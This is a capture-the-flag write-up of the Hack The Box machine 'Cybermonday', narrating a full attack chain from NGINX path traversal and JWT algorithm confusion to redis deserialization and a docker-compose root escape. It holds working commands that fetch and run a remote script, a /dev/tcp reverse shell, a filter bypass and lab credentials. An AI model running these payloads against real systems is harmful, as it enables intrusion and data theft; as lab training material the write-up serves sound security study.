Cybermonday – Hack The Box


I’ve never been as challenged by a machine as I was by this one. Although it is rated as hard, it feels closer to insane in the sheer number of steps and hoops to jump through to overcome every roadblock and make even the smallest bit of progress. The first important clue I found was an exposed /assets/ directory that was storing images and other site information. The server was NGINX, and I abused what is called an “Off by Slash” misconfiguration, which let me fuzz one directory above the aliased /assets/ folder, like so: /assets../FUZZ. Using a wordlist designed to leak exactly that kind of thing, I was able to expose important internal files. One of them was .env, which contained a treasure trove of useful information for progressing. From there, tinkering with the website showed me that errors were opening debugging pages, which further confirmed the existence of redis and a database in the backend. Registering on the site and logging in gave me profile update options, which allowed me to become admin by sending a tampered request containing isAdmin=1. From there I made my way into the admin panel and the Changelog, which talked about webhooks and mentioned a webhooks-api-beta subdomain.

Visiting that page and following its instructions on how to view, register, log in, and create webhooks set up an attack known as an algorithm confusion attack, using the server’s public key found at the subdomain’s /jwks.json page. I converted the RS256 x-access-token given to me at login to HS256 and inserted an admin role inside jwt.io, then used jwt_tool.py to re-sign that tampered HS256 token with the public key by feeding it into the tool and supplying a couple of flags, which gave me the ability to create webhooks. Having successfully created a webhook, I was able to make requests using the key-value pairs documented on the webhooks-api-beta subdomain and confirmed they worked by making calls back to my machine using the method and url parameters. The next step was to obtain a reverse shell, and I had to use redis to do so, alongside Laravel cookie decryption techniques, since cookies expired after a certain time period and had to be regenerated. The Laravel cookie decryption was based on a script from HackTricks which entailed using the web app’s cookie and the APP_KEY found in the .env file. Thereafter I had to craft a payload for the laravel_session key with phpggc that contained my reverse shell. After sending that payload and refreshing the site, I had a reverse shell as www-data inside a container.

I was limited in what I could do in that container, so I imported a static version of nmap and ran an internal scan of the container’s network to see what services were running. Chisel was my friend here: it creates an encapsulated TCP session inside an HTTP tunnel, secured via SSH, and let me relay the Docker registry’s port 5000 to port 5000 on my machine, allowing me to see the registry’s image repo name and pull the latest image, which I then swam through in a terminal environment. There I discovered the source code for many functions and was able to use Chisel once again to access the database as the root user.
Apparently, as the source code suggested, if one modified the default webhook’s name to path traversal characters, one could abuse the list function and list the contents of a chosen directory in another container. I could also abuse the read function, which allowed me to read files, and I used it to read /proc/self/environ and find a password belonging to the user john. The user john was nowhere to be found except inside /mnt/.ssh/authorized_keys in the original container I had first landed in, where his name was specified. I then SSH’d in as john and took the first step of unveiling the privesc path, sudo -l, which revealed a Python script I could run with root privileges. The code was very well written and it was not easy to spot a vulnerability, but further investigation showed that its checks did not cover everything. Crafting a malicious docker-compose file, with the help of a lot of googling and ChatGPT, got me a reverse shell in a container spun up from the cybermonday_api image. There I mounted the host machine’s disk, made my way to root’s home directory and inserted my SSH public key, at which point I unmounted it and exited the container. I then used my private SSH key to SSH into the real host machine as root and captured both flags.


NMAP


Nmap revealed 4 open ports: 22, 80, 9071 and 32774. The latter two were not useful:


Site Inspection


Initially, visiting the website gave me an error, which I fixed by resetting the machine. Still, the error itself was interesting to read: “READONLY You can’t write against a read only replica.”:

Everything was pointing to redis when I googled this error:

This is as useful as the debugging page got, so I reset the box to view the actual website:

Or sign up:

Upon registering, I am met with this page:

Before moving forward I wanted to fuzz for subdirectories:


Ffuf Scanning


sudo ffuf -c -w /usr/share/SecLists/Discovery/Web-Content/big.txt -u http://cybermonday.htb/FUZZ

I also wanted to examine the contents of another subdirectory, /assets, which I had found referenced in the source code of the web app:

sudo ffuf -c -w /usr/share/SecLists/Discovery/Web-Content/big.txt -u http://cybermonday.htb/assets/FUZZ

This led to nothing, because there was a catch I was not aware of at the time. I learned about a misconfiguration common to NGINX servers called “Off By Slash”: when a location directive in NGINX does not end with a slash, it is possible to traverse one step up the path, allowing an attacker to read files stored outside the target folder. In this case it let me fuzz one directory above the aliased /assets/ folder, like so: http://cybermonday.htb/assets../FUZZ

sudo ffuf -c -w /usr/share/SecLists/Discovery/Web-Content/big.txt -u http://cybermonday.htb/assets../FUZZ
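For reference, the kind of NGINX directive behind this behaviour looks roughly like the following (the paths are hypothetical, not taken from the box): because the location prefix has no trailing slash, a request to /assets../.env resolves into the parent of the aliased folder.

# hypothetical vulnerable configuration:
# /assets../.env  ->  /var/www/app/assets/../.env  ->  /var/www/app/.env
location /assets {
    alias /var/www/app/assets/;
}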

I tried accessing /.git but was given access denied. Even using GitDump to dump the git repository revealed no interesting files:

From here, knowing the app ran Laravel from having explored the debugger, I proceeded to fuzz the /assets../ path using a wordlist of internal file names:
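The exact wordlist is a matter of taste; as an example (not necessarily the one I used), something like SecLists’ quickhits.txt, which targets exactly these kinds of sensitive file names, would be run as:

sudo ffuf -c -w /usr/share/SecLists/Discovery/Web-Content/quickhits.txt -u http://cybermonday.htb/assets../FUZZ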

This output a bunch of interesting-looking files, the most interesting of which was .env. Everything mentioning .git was what I had already dumped with GitDump.

Visiting /assets../.env downloaded a file called index.env which, when opened, looked like the following, and would end up being extremely useful later on:

Next, continuing with the site exploration, I visited the products page, which displays the products:

Clicking on View and trying to purchase something showed that the Buy buttons were not clickable.


Becoming Admin


Next, I logged back out and tried creating a new account with the first username that popped up in my head, admin. Upon doing that I obtained an SQLSTATE 23000 error which said: “SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry ‘admin’ for key ‘users.users_username_unique’”

Above, in the debugger, there is a function handling the updating of the user’s profile based on the data received in the HTTP request. Below is another snippet from the debugger detailing the user I registered as.

Here’s what’s happening step by step in the debugger function above:

  1. It retrieves data from the request, excluding the “_token,” “password,” and “password_confirmation” fields.
  2. It retrieves the user object from the database based on the authenticated user’s ID.
  3. If the request contains a password and it’s not empty:
    • It checks if the entered password and the password confirmation match. If not, it flashes an error message to the session and redirects back to the previous page.
    • If the passwords match, it hashes the new password using the bcrypt function and assigns it to the $data array.
  4. It updates the user’s data with the updated $data array.
  5. It flashes a success message to the session indicating that the profile has been updated.
  6. It redirects back to the previous page.

Overall, this code seems to be managing the process of updating a user’s profile information, including handling password changes, displaying success and error messages using session flash data, and ensuring the user’s data is securely stored using Laravel’s bcrypt function for password hashing.

So, since the update applies whatever fields arrive in the request, sending a request like the one below with an extra isAdmin=1 field should grant me the admin role on the web app.

Inside the Personal Information panel, I intercepted the account update request and before sending it over I inserted &isAdmin=yes and clicked send:
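The tampered update request looked something along these lines; the path and most field names here are placeholders, and the appended isAdmin parameter is the part that matters:

POST /home/update HTTP/1.1
Host: cybermonday.htb
Cookie: cybermonday_session=<cookie>
Content-Type: application/x-www-form-urlencoded

_token=<csrf-token>&username=dada&email=<email>&password=&password_confirmation=&isAdmin=yes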

Doing this unlocked a Dashboard panel:

Visiting the Changelog page offers this:


Exploring Webhooks


Visiting the Webhook link brings me to a subdomain, which I had to add to the /etc/hosts file. The page documents the API endpoints I had to follow verbatim in order to use the webhooks API, starting from /auth/register and going all the way to /webhooks/create and /webhooks/UUID:

From this, I wanted to register and follow the steps sequentially. Upon registering I received a success status and message. When logging in I was given an x-access-token:
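The register and login calls were plain JSON POSTs along these lines (the /auth/login path and the body field names are assumptions modeled on the documented /auth/register endpoint):

curl -X POST http://webhooks-api-beta.cybermonday.htb/auth/register -H "Content-Type: application/json" -d '{"username":"dada","password":"password123"}'
curl -X POST http://webhooks-api-beta.cybermonday.htb/auth/login -H "Content-Type: application/json" -d '{"username":"dada","password":"password123"}'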

I then simply followed the instructions on how to list the webhooks I had created or that already existed. The default one, created for tests, had a UUID of fda96d32-e8c8-4301-8fb3-c821a316cf77. I could now use the GET method to view the webhooks, passing the newly obtained x-access-token:

curl -X GET http://webhooks-api-beta.cybermonday.htb/webhooks -H "x-access-token:eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJkYWRhIiwicm9sZSI6InVzZXIifQ.N_KsSq6gmESa_WBBlnjowJfVTM7F-IkEs5NorQwjrf12sfBTp6fdJmc11Pt7vQVJxVsEYP2PlTil_PcXwY-L35wpjrcMqwTbBzHMHCF2i3y0rOHc4pe-BVn2kyk32JaKJJm3T4jFiqSn9S4oB6dY96_v2XVAA9maXifMaZDYxEBjK3mxiYwvYrrwfWm38jsN_6lerMtQgVj0NZWEF59in4GPHMsSxZvkOhEIDP9f1dVnMHFGZB80XPNVTECjSrAU4CaiRH95Ot3XTVxkwuSYOyZygI6cpIlgpPmUD9ctNVJ28UKBcO3QKiBc2Obvusmnw7iCEkGLz9jcUZaCR0V0ew"

Tampered JWT Tokens


From there, after lengthy research into how to forge tokens, I found out I had to take the x-access-token (RS256) and switch it to HS256 via the algorithm drop-down menu in jwt.io:

Next, I had to change the role to admin instead of user while in the HS256 algorithm:

From here the situation threw me a bit of a curveball: the HS256-encoded token with the newly assigned admin role could not be used as-is, because it still had to be signed with something the server would accept. Signing it with the server’s own RSA public key as the HMAC secret is what is known as an algorithm confusion attack.

At first I researched a way to exploit jwt and was exposed to the algorithm confusion attack by simply browsing around:

This detailed that I needed to grab the exposed public key at the /jwks.json endpoint:

And to my surprise it was indeed there:

To perform the algorithm confusion attack I first needed a tool such as jwt_tool to convert the exposed JWKS into a pem file for me, which I’d end up using as the signing key for the tampered HS256 token. What I needed was the original x-access-token given to me upon login (before any RS256-to-HS256 transformation) alongside the proper flags: -V -jw.

This generated a pem file:

python3 /jwt_tool.py "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJkYWRhIiwicm9sZSI6InVzZXIifQ.N_KsSq6gmESa_WBBlnjowJfVTM7F-IkEs5NorQwjrf12sfBTp6fdJmc11Pt7vQVJxVsEYP2PlTil_PcXwY-L35wpjrcMqwTbBzHMHCF2i3y0rOHc4pe-BVn2kyk32JaKJJm3T4jFiqSn9S4oB6dY96_v2XVAA9maXifMaZDYxEBjK3mxiYwvYrrwfWm38jsN_6lerMtQgVj0NZWEF59in4GPHMsSxZvkOhEIDP9f1dVnMHFGZB80XPNVTECjSrAU4CaiRH95Ot3XTVxkwuSYOyZygI6cpIlgpPmUD9ctNVJ28UKBcO3QKiBc2Obvusmnw7iCEkGLz9jcUZaCR0V0ew" -V -jw /jwks.json

Only now was I able to perform the algorithm confusion attack, signing the HS256 token carrying the admin role with the recovered public key, through the use of the -S (signing algorithm) and -k (key file) flags:
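The signing step looked roughly like this; a sketch, assuming the pem filename is whatever the earlier -V -jw run exported, and the token in quotes is the HS256 one carrying role admin:

python3 jwt_tool.py "<HS256 token with role=admin>" -S hs256 -k kid_from_jwks.pem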

The new tampered token appeared at the bottom:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJkYWRhIiwicm9sZSI6ImFkbWluIn0.AHfeOavNhzaFycN0-DBkpEjTwOR0xEgR7XesR8zYzEU

I then used it to create a new webhook and was met with a successful result. I had a webhook_uuid:

Attempting a sendRequest action directed at a server I was hosting on port 80 did not produce a callback this time around, though it had worked originally. A callback did occur, however, when I used the method and url parameters:

Now I had to somehow connect the dots with redis and find a way to obtain a reverse shell. Given that the .env file I had extracted via ffuf contained the redis information and the app key, I decided to move forward with those and look for potential paths to exploitation.

After some research, I stumbled upon a HackTricks article detailing laravel cookie decryption.

The cookie in question was the cybermonday_session cookie found when authenticating at the main website:

That HackTricks article contained a script to decrypt the cookie, given the cybermonday_session cookie and the app key found in .env.

The only change I had to make to the script was at the end, so that it printed the result: namely, wrap the decrypt() call in a print():

import os
import json
import hashlib
import sys
import hmac
import base64
import string
import requests
from Crypto.Cipher import AES
from phpserialize import loads, dumps
#https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3
def mcrypt_decrypt(value, iv):
    global key
    AES.key_size = [len(key)]
    crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
    return crypt_object.decrypt(value)
def mcrypt_encrypt(value, iv):
    global key
    AES.key_size = [len(key)]
    crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
    return crypt_object.encrypt(value)
def decrypt(bstring):
    global key
    dic = json.loads(base64.b64decode(bstring).decode())
    mac = dic['mac']
    value = bytes(dic['value'], 'utf-8')
    iv = bytes(dic['iv'], 'utf-8')
    if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest():
        return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))
        #return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode()
    return ''
def encrypt(string):
    global key
    iv = os.urandom(16)
    #string = dumps(string)
    padding = 16 - len(string) % 16
    string += bytes(chr(padding) * padding, 'utf-8')
    value = base64.b64encode(mcrypt_encrypt(string, iv))
    iv = base64.b64encode(iv)
    mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest()
    dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac}
    return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))
app_key ='EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA='
key = base64.b64decode(app_key)
print(decrypt('eyJpdiI6IkF0MjFEV2Nld1RpTGtzSVNGdjBrTEE9PSIsInZhbHVlIjoieGkrbGZDQjBYejIzNUIwcjVhdzdwWVhPWWY4eklNOXgrb3MrRE5zWEoxVW8wT0JmWExRdSszeVU0ZTJDa3lXNlY4cUdGWWRUWjd0Q0JZSjRmNFBZWEp2WU1PZ0w4dW9heTlmZ2wyYnlwTVJkeVJHOVQ5bGhFNWVZemM2M25Xd1UiLCJtYWMiOiJkN2M5YjM2OTIzMjQ4MWI4ZDMyOWZlYjE5MmE2NTRjZmIyMDY1OTljY2RiZjYxN2UwNGMzZDhmYTU5N2JiYWE5IiwidGFnIjoiIn0='))

I then had to insert the app key and the cookie (omitting the %3D, which is a URL-encoded equals sign =) into the script. Running it generated the output below (which varied every time because of the different login sessions) and revealed the laravel_session key:


Checking Laravel_Session Key Existence


Now I had to check whether such a key existed in redis, through the MIGRATE command (which took me a long time to find out about). Here I followed the manual from the official redis website, which gives the syntax along the lines of MIGRATE 192.168.1.34 6379 "" 0 5000 KEYS key1 key2 key3, except that as the key I inserted the laravel_session value recovered above, and instead of everything after the timeout I appended \r\n\r\n :

The request turned out something like this:

MIGRATE 10.10.16.11 6379 laravel_session:HjRlg5m1ryqfibkNDcX8vUVIHox0wQzP1idgwn02 0 5000\r\n\r\n

This gave me a successful callback on my listening port 6379, which means such a key does exist in redis.
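A request along these lines, sent to the sendRequest webhook I had created, carries the command over to the internal redis service; the redis hostname and the exact JSON shape are assumptions based on the url and method parameters seen earlier:

curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/<uuid-of-my-sendRequest-webhook> -H "Content-Type: application/json" -H "x-access-token: <tampered admin token>" -d '{"url":"http://redis:6379","method":"MIGRATE 10.10.16.11 6379 laravel_session:HjRlg5m1ryqfibkNDcX8vUVIHox0wQzP1idgwn02 0 5000\r\n\r\n"}'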


Crafting Reverse Shell Payload


From there, I learned that I had to craft a payload for the laravel_session key with phpggc in order to get a reverse shell (immense amounts of time passed before I figured out how to craft this payload, which I named “The Holy Payload“). PHPGGC is a library of payloads exploiting unsafe object deserialization, and it also provides a command-line tool to generate them.

To generate the payload I had to run phpggc with the following flags: --json -a

./phpggc --json -a Laravel/RCE10 system "curl http://10.10.16.11/reverse.sh | bash" 

Which output:

"O:38:\"Illuminate\\Validation\\Rules\\RequiredIf\":1:{S:9:\"condition\";a:2:{i:0;O:28:\"Illuminate\\Auth\\RequestGuard\":3 {S:8:\"callback\";S:14:\"call_user_func\";S:7:\"request\";S:6:\"system\";S:8:\"provider\";S:41:\"curl http:\/\/10.10.16.11\/reverse.sh | bash\";}i:1;S:4:\"user\";}}"

After writing this serialized object into my laravel_session key in redis and refreshing the website, Laravel unserialized it and ran the payload, which fetched my bash reverse shell file, reverse.sh, from the server I was hosting on port 80 and piped it to bash, giving me a reverse shell:
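For completeness, reverse.sh was just a standard one-liner; a sketch, with the listener port chosen as an example:

#!/bin/bash
bash -i >& /dev/tcp/10.10.16.11/4444 0>&1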


Exploring Container & Network Capabilities


I then imported the static version of nmap and ran an internal scan of the network I derived from the container’s address, which revealed a bunch of interesting things. Running hostname -I revealed the IP address (172.18.0.7) assigned to this specific container on the internal network interface, used for communication within the Docker bridge network.

Running nmap with the -sn flag against 172.18.0.1/16 gave me this output:

When you use nmap to scan for hosts on the network, you need to specify a range of IP addresses to scan. The /16 in 172.18.0.1/16 is a CIDR (Classless Inter-Domain Routing) notation, which represents a subnet mask. In this case, it means I am scanning a range of IP addresses within the 172.18.0.0 network.

Here’s what’s happening:

  • 172.18.0.7 is the IP address of the container within the 172.18.0.0/16 network.
  • When scanning 172.18.0.1/16, you are scanning all IP addresses from 172.18.0.1 to 172.18.255.255, which covers a large address range within the 172.18.0.0/16 network.
  • This is essentially telling nmap to scan for hosts within that entire range to discover other devices or containers that might be present on the Docker bridge network.

The choice of /16 is based on the network architecture and how Docker manages its networks. Docker uses bridge networks by default, and the /16 subnet mask provides a large address space for potential containers within the network. It’s a common practice to use /16 for Docker bridge networks to accommodate a significant number of containers while still keeping them isolated within the same network segment. However, one could use a different subnet mask based on specific network requirements.

A CIDR (Classless Inter-Domain Routing) notation with /16 covers a total of 65,536 IP addresses.

Here’s the breakdown:

  • IPv4 addresses consist of 32 bits.
  • When you use /16 as the subnet mask, it means the leftmost 16 bits are fixed as the network portion, and the remaining 16 bits are variable for host addresses.
  • In binary, the first 16 bits are all ones (1s), like this: 11111111 11111111.
  • When you convert that binary to decimal, you get 255.255 for the network portion.
  • So, you have 2^16 possible combinations for the host portion, which equals 65,536.

Therefore, a /16 CIDR notation covers a total of 65,536 unique IPv4 addresses within the same network segment.
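In command form, the host-discovery sweep from inside the container was simply the following (the binary name depends on the static build uploaded):

./nmap -sn 172.18.0.1/16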


Chisel Docker Registry Port Forwarding


From here, I wanted to use chisel, which creates an encapsulated TCP session inside an HTTP tunnel secured via SSH, to relay the Docker registry’s port 5000 (the registry’s default port, labeled cybermonday_registry in the nmap scan) to port 5000 on my machine. This would let me see the registry’s image repo name, pull the latest image and swim through it in a terminal environment.

I ran this on my machine:

./chisel_1.9.1 server --port 8000 --reverse

And this on the client:

www-data@070370e2cdc4:~/html/public$ ./chisel_1.9.1 client 10.10.16.11:8000 R:5000:172.18.0.2:5000

I then needed to find the name of the Docker image hosted by the registry, which is usually listed at /v2/_catalog (something I learned along the way; I had no idea about it at the time):
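With the port forward up, the registry could be queried through the standard Registry v2 API; the second call is only illustrative and uses the repository name that the catalog ended up revealing:

curl http://localhost:5000/v2/_catalog
curl http://localhost:5000/v2/cybermonday_api/tags/list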


Pulling Docker Images & Spawning Interactive Shell To Read Source Code Files


From here, I had learned I needed to run the command below in order to download the images from the docker registry:

sudo docker pull localhost:5000/cybermonday_api:latest

This started extracting the images like so:

Here, I needed to focus on the latest image, and thus ran this command, which spawned an interactive shell inside it and allowed me to navigate through its files:

sudo docker run -ti --entrypoint /bin/sh localhost:5000/cybermonday_api:latest

Within the image’s filesystem, four files were important:

1. /var/www/html/app/routes/Router.php (Source code for webhooks-api-beta.cybermonday.htb). This revealed a hidden endpoint /webhooks/:uuid/logs:

2. /var/www/html/app/controllers/LogsController.php

This file detailed how the list and read actions worked, including how the read action applied some filtering for path traversal characters. The file also called apiKeyAuth() to check that the caller was authorized to use the API:

3. /var/www/html/app/helpers/Api.php – API_KEY (22892e36-1770-11ee-be56-0242ac120002)

This is the apiKeyAuth function that /var/www/html/app/controllers/LogsController.php was calling. It contained an api key:

4. var/www/html/app/functions/webhook_actions.php (The way webhook logs functioned):

Here, the log directories are named after the webhooks, because mkdir is called on $log_path, which is composed of /logs/$webhook_name/. This means that if the webhook name contains path traversal characters, one can list and read files outside the intended directory:


Exploiting Vuln In DB - Chisel Port Forwarding


To be able to modify values inside the db, I had to use chisel once again to bring the db over to my host machine, as I was limited in what I could do inside the container.

To connect to DB:

Target:

./chisel_1.9.1 client 10.10.16.11:9000 R:3306:172.18.0.2:3306

My machine:

./chisel_1.9.1 server --port 9000 --reverse

Then, using the credentials I found inside the .env file, I managed to get inside the database:

I initially accessed the cybermonday database, but the webhooks_api database was the one I was interested in, so I connected to it directly:

mysql -h 127.0.0.1 -P 3306 -u root -p webhooks_api (Password: root) (or DB=cybermonday)

Once in, to be able to list files, I had to update the test webhook’s name to ../ instead of tests by running:

UPDATE webhooks
SET name = '../'
WHERE uuid = 'fda96d32-e8c8-4301-8fb3-c821a316cf77';

Now, to list the files, I simply had to use the webhook meant for tests alongside the action parameter. The only way to know to do this was to consult the /var/www/html/app/controllers/LogsController.php file, where the source code for this function was listed:

This listed some files one directory above the logs folder, outside of the container I was in (the one the web app was running from).
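The list call itself looked roughly like this; the x-api-key header name is an assumption, while the key value is the one recovered from Api.php:

curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77/logs -H "Content-Type: application/json" -H "x-api-key: 22892e36-1770-11ee-be56-0242ac120002" -d '{"action":"list"}'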

Now, to read specific files, I had to take a different approach within Burp: use the read action and also supply a log_name. Within the log_name field’s value, I had to insert path traversal characters (on top of the ../ I had inserted as the name in the db) leading to the /etc/passwd file.

Still inside the /var/www/html/app/controllers/LogsController.php file, I could see that there was a path traversal filtering to prevent any unwanted disclosure:

The way to bypass this was simple (for someone who knew how to do it): one had to insert / .. / instead of ../, because of the filtering put in place. Notice the spaces before and after the two dots. The server’s input validation logic appears to be checking for "../", and since there’s a space before .., it doesn’t match the pattern and the request is allowed to proceed.

This allowed me to read the /etc/passwd file, albeit the Docker container’s copy of it:


Finding Creds to SSH


Scouting through /proc/self/environ I was able to find a password (ngFfX2L71Nu) with which I logged into the database as dbuser this time but found nothing else of use:

This password (ngFfX2L71Nu), coupled with the username john that I had found in the first container I landed in as www-data (inside /mnt/.ssh/authorized_keys), allowed me to SSH into the real machine hosting all the containers.


Privilege Escalation


Running sudo -l revealed the next step to becoming root:

The secure_compose.py file was the following:

#!/usr/bin/python3
import sys, yaml, os, random, string, shutil, subprocess, signal

def get_user():
    return os.environ.get("SUDO_USER")

def is_path_inside_whitelist(path):
    whitelist = [f"/home/{get_user()}", "/mnt"]

    for allowed_path in whitelist:
        if os.path.abspath(path).startswith(os.path.abspath(allowed_path)):
            return True
    return False

def check_whitelist(volumes):
    for volume in volumes:
        parts = volume.split(":")
        if len(parts) == 3 and not is_path_inside_whitelist(parts[0]):
            return False
    return True

def check_read_only(volumes):
    for volume in volumes:
        if not volume.endswith(":ro"):
            return False
    return True

def check_no_symlinks(volumes):
    for volume in volumes:
        parts = volume.split(":")
        path = parts[0]
        if os.path.islink(path):
            return False
    return True

def check_no_privileged(services):
    for service, config in services.items():
        if "privileged" in config and config["privileged"] is True:
            return False
    return True

def main(filename):

    if not os.path.exists(filename):
        print(f"File not found")
        return False

    with open(filename, "r") as file:
        try:
            data = yaml.safe_load(file)
        except yaml.YAMLError as e:
            print(f"Error: {e}")
            return False

        if "services" not in data:
            print("Invalid docker-compose.yml")
            return False

        services = data["services"]

        if not check_no_privileged(services):
            print("Privileged mode is not allowed.")
            return False

        for service, config in services.items():
            if "volumes" in config:
                volumes = config["volumes"]
                if not check_whitelist(volumes) or not check_read_only(volumes):
                    print(f"Service '{service}' is malicious.")
                    return False
                if not check_no_symlinks(volumes):
                    print(f"Service '{service}' contains a symbolic link in the volume, which is not allowed.")
                    return False
    return True

def create_random_temp_dir():
    letters_digits = string.ascii_letters + string.digits
    random_str = ''.join(random.choice(letters_digits) for i in range(6))
    temp_dir = f"/tmp/tmp-{random_str}"
    return temp_dir

def copy_docker_compose_to_temp_dir(filename, temp_dir):
    os.makedirs(temp_dir, exist_ok=True)
    shutil.copy(filename, os.path.join(temp_dir, "docker-compose.yml"))

def cleanup(temp_dir):
    subprocess.run(["/usr/bin/docker-compose", "down", "--volumes"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    shutil.rmtree(temp_dir)

def signal_handler(sig, frame):
    print("\nSIGINT received. Cleaning up...")
    cleanup(temp_dir)
    sys.exit(1)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Use: {sys.argv[0]} <docker-compose.yml>")
        sys.exit(1)

    filename = sys.argv[1]
    if main(filename):
        temp_dir = create_random_temp_dir()
        copy_docker_compose_to_temp_dir(filename, temp_dir)
        os.chdir(temp_dir)

        signal.signal(signal.SIGINT, signal_handler)

        print("Starting services...")
        result = subprocess.run(["/usr/bin/docker-compose", "up", "--build"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        print("Finishing services")

        cleanup(temp_dir)

The code was very solidly written. Here’s what it did in a nutshell:

The script is a security-focused utility for checking and running Docker Compose files. It performs several checks on the Docker Compose configuration specified in a YAML file and executes the services defined in that file if it passes the checks. Here are some of the checks it performs:

  1. Privileged Mode Check: It checks if any service is running in privileged mode (privileged: true). Privileged mode can provide elevated access within a container, which can be a security risk.
  2. Volume Whitelist Check: It checks if the volumes specified in the services are allowed based on a whitelist of paths. It restricts the use of certain paths and allows only paths within the /home/{username} and /mnt directories.
  3. Read-Only Volumes Check: It checks if the volumes are mounted as read-only (:ro). Read-only volumes prevent data from being written to the container’s filesystem.
  4. No Symbolic Links Check: It checks if any of the specified volumes contain symbolic links (symlinks). Symbolic links in volumes can potentially be used for security exploits.
  5. Temporary Directory Creation: It creates a random temporary directory and copies the Docker Compose file into it before running the services. This is done to isolate the services and their data.
  6. Signal Handling: It handles the SIGINT signal (Ctrl+C) for graceful cleanup when the script is interrupted.

I asked ChatGPT to expand on the temporary directory creation (point 5):

Here is what this part of the script did:

The script deals with the creation of a temporary directory and copying the Docker Compose file into it before running the services. This step is performed to isolate the services and their data, enhancing security and avoiding potential conflicts with existing containers or data. Here’s a more in-depth explanation:

1. Random Temporary Directory:

  • The script generates a random alphanumeric string to create a unique temporary directory. This string is used as part of the temporary directory’s name.

2. Directory Creation:

  • Using the generated random string, a temporary directory is created in the /tmp directory. The path to the temporary directory is stored in the temp_dir variable.

3. Directory Isolation:

  • The temporary directory serves as an isolated environment for running the Docker Compose services.
  • This isolation helps prevent conflicts or interference with existing containers, data, or configurations on the host system.

4. Copy Docker Compose File:

  • The script copies the specified Docker Compose file (passed as a command-line argument) into the temporary directory.
  • This copy ensures that the Docker Compose file used for service execution is located within the isolated environment.

5. Change Working Directory:

  • After copying the Docker Compose file, the script changes the working directory to the temporary directory using the os.chdir() function.
  • Changing the working directory ensures that Docker Compose commands executed subsequently operate within the isolated context.

6. Signal Handling for Cleanup:

  • The script sets up a signal handler for the SIGINT signal (Ctrl+C) using signal.signal().
  • If the user interrupts the script (e.g., by pressing Ctrl+C), the signal handler initiates a cleanup process to remove the temporary directory and gracefully shut down any Docker Compose services that were started.

7. Running Docker Compose Services:

  • After all preparations are complete, the script proceeds to run the Docker Compose services within the isolated temporary directory.
  • This ensures that the services are executed in a controlled environment with a predefined Docker Compose configuration.

This led me to create a docker_compose.yml file containing a reverse shell. Further research led me to also use the devices option in order to pass the host’s disk device into the container, since a reverse shell alone was not going to achieve anything, and mounting volumes was hard to pull off due to all the filtering and read-only restrictions imposed by the code above.

My initial docker_compose file looked like so:

From there, this worked, but the mount failed with a permission denied message:

Searching for how to bypass that, I came across “Can Docker volumes be mounted from a device instead of bind mounting a directory? – Server Fault”, which mentions capabilities. That pointed me to Docker’s official documentation on compose file capabilities (“Compose file version 3 reference | Docker Docs”), which detailed how full capabilities could be granted in the docker_compose file I was crafting in order to bypass that permission error. Updating my file with this change made it look like so:

Nevertheless, this generated another error:

From this I googled “Unable to mount Read-only file system” and found this askubuntu question “Unable to mount Read-only file system” where I attempted to mount/remount /dev/sda99 to /mnt with rw permissions:

This generated another error saying /dev/sda99 was write-protected. I then googled “mount: /mnt: cannot remount read-write, is write-protected docker bypass”, which brought me to a Stack Overflow page discussing AppArmor and how to bypass the restrictions it puts in place.

HackTricks also detailed how to disable apparmor to bypass its restrictions in the same manner.

The option to add to my docker_compose file was the compose equivalent of --security-opt apparmor:unconfined, i.e. the security_opt key.

So my final payload looked like this:
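Since the file itself only appears as a screenshot, here is a minimal sketch of a compose file along these lines (the service name and listener port are illustrative, and bash being present in the image is an assumption): it reuses the cybermonday_api image, passes the host disk through with devices, grants full capabilities, disables AppArmor confinement, and calls back to my listener.

version: "3"
services:
  shell:
    image: cybermonday_api
    command: 'bash -c "bash -i >& /dev/tcp/10.10.16.11/4444 0>&1"'
    devices:
      - "/dev/sda99:/dev/sda99"
    cap_add:
      - ALL
    security_opt:
      - apparmor:unconfined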

Next, all I did was run secure_compose.py as sudo with my final payload file, run mount /dev/sda99 /mnt inside the resulting container, navigate to /mnt and into root’s home directory, create a .ssh directory there (with chmod 700 .ssh), insert my public SSH key into its authorized_keys file (with chmod 600 authorized_keys), and unmount /dev/sda99 so as not to break the machine for other users on the same shared instance. I then SSH’d in as root and captured both flags.
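Inside the container’s reverse shell, the closing sequence was essentially the following (public key abbreviated):

mount /dev/sda99 /mnt
mkdir -p /mnt/root/.ssh && chmod 700 /mnt/root/.ssh
echo 'ssh-ed25519 AAAA...' >> /mnt/root/.ssh/authorized_keys
chmod 600 /mnt/root/.ssh/authorized_keys
umount /mnt

And from my machine:

ssh root@cybermonday.htb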


COMPLETED


